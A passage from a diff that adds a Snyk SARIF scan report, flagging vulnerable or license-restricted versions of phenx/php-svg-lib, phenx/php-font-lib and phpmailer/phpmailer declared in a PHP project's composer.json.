+ "uri": "composer.json"
774
+ },
775
+ "region": {
776
+ "startLine": 1
777
+ }
778
+ },
779
+ "logicalLocations": [
780
+ {
781
+ "fullyQualifiedName": "phenx/php-svg-lib@0.4.1"
782
+ }
783
+ ]
784
+ }
785
+ ]
786
+ },
787
+ {
788
+ "ruleId": "SNYK-PHP-PHENXPHPSVGLIB-6262046",
789
+ "level": "warning",
790
+ "message": {
791
+ "text": "This file introduces a vulnerable phenx/php-svg-lib package with a medium severity vulnerability."
792
+ },
793
+ "locations": [
794
+ {
795
+ "physicalLocation": {
796
+ "artifactLocation": {
797
+ "uri": "composer.json"
798
+ },
799
+ "region": {
800
+ "startLine": 1
801
+ }
802
+ },
803
+ "logicalLocations": [
804
+ {
805
+ "fullyQualifiedName": "phenx/php-svg-lib@0.4.1"
806
+ }
807
+ ]
808
+ }
809
+ ]
810
+ },
811
+ {
812
+ "ruleId": "snyk:lic:composer:phenx:php-svg-lib:LGPL-3.0",
813
+ "level": "error",
814
+ "message": {
815
+ "text": "This file introduces a vulnerable phenx/php-svg-lib package with a high severity vulnerability."
816
+ },
817
+ "locations": [
818
+ {
819
+ "physicalLocation": {
820
+ "artifactLocation": {
821
+ "uri": "composer.json"
822
+ },
823
+ "region": {
824
+ "startLine": 1
825
+ }
826
+ },
827
+ "logicalLocations": [
828
+ {
829
+ "fullyQualifiedName": "phenx/php-svg-lib@0.4.1"
830
+ }
831
+ ]
832
+ }
833
+ ]
834
+ },
835
+ {
836
+ "ruleId": "SNYK-PHP-PHPMAILERPHPMAILER-1311001",
837
+ "level": "error",
838
+ "message": {
839
+ "text": "This file introduces a vulnerable phpmailer/phpmailer package with a critical severity vulnerability."
840
+ },
841
+ "locations": [
842
+ {
843
+ "physicalLocation": {
844
+ "artifactLocation": {
845
+ "uri": "composer.json"
846
+ },
847
+ "region": {
848
+ "startLine": 1
849
+ }
850
+ },
851
+ "logicalLocations": [
852
+ {
853
+ "fullyQualifiedName": "phpmailer/phpmailer@6.4.1"
854
+ }
855
+ ]
856
+ }
857
+ ]
858
+ },
859
+ {
860
+ "ruleId": "SNYK-PHP-PHPMAILERPHPMAILER-1311002",
861
+ "level": "error",
862
+ "message": {
863
+ "text": "This file introduces a vulnerable phpmailer/phpmailer package with a critical severity vulnerability."
864
+ },
865
+ "locations": [
866
+ {
867
+ "physicalLocation": {
868
+ "artifactLocation": {
869
+ "uri": "composer.json"
870
+ },
871
+ "region": {
872
+ "startLine": 1
873
+ }
874
+ },
875
+ "logicalLocations": [
876
+ {
877
+ "fullyQualifiedName": "phpmailer/phpmailer@6.4.1"
878
+ }
879
+ ]
880
+ }
881
+ ]
882
+ },
883
+ {
884
+ "ruleId": "snyk:lic:composer:phpmailer:phpmailer:LGPL-2.1",
885
+ "level": "error",
886
+ "message": {
887
+ "text": "This file introduces a vulnerable phpmailer/phpmailer package with a high severity vulnerability."
888
+ },
889
+ "locations": [
890
+ {
891
+ "physicalLocation": {
892
+ "artifactLocation": {
893
+ "uri": "composer.json"
894
+ },
895
+ "region": {
896
+ "startLine": 1
897
+ }
898
+ },
899
+ "logicalLocations": [
900
+ {
901
+ "fullyQualifiedName": "phpmailer/phpmailer@6.4.1"
902
+ }
903
+ ]
904
+ }
905
+ ]
906
+ },
907
+ {
908
+ "ruleId": "snyk:lic:composer:phenx:php-font-lib:LGPL-3.0",
909
+ "level": "error",
910
+ "message": {
911
+ "text": "This file introduces a vulnerable phenx/php-font-lib package with a high severity vulnerability."
912
+ },
913
+ "locations": [
914
+ {
915
+ "physicalLocation": {
916
+ "artifactLocation": {
917
+ "uri": "composer.json"
918
+ },
919
+ "region": {
920
+ "startLine": 1
921
+ }
922
+ },
923
+ "logicalLocations": [
924
+ {
925
+ "fullyQualifiedName": "phenx/php-font-lib@0.5.4"
926
+ }
927
+ ]
928
+ }
929
+ ]
930
+ }
931
+ ]
932
+ }
933
+ ]
934
+ }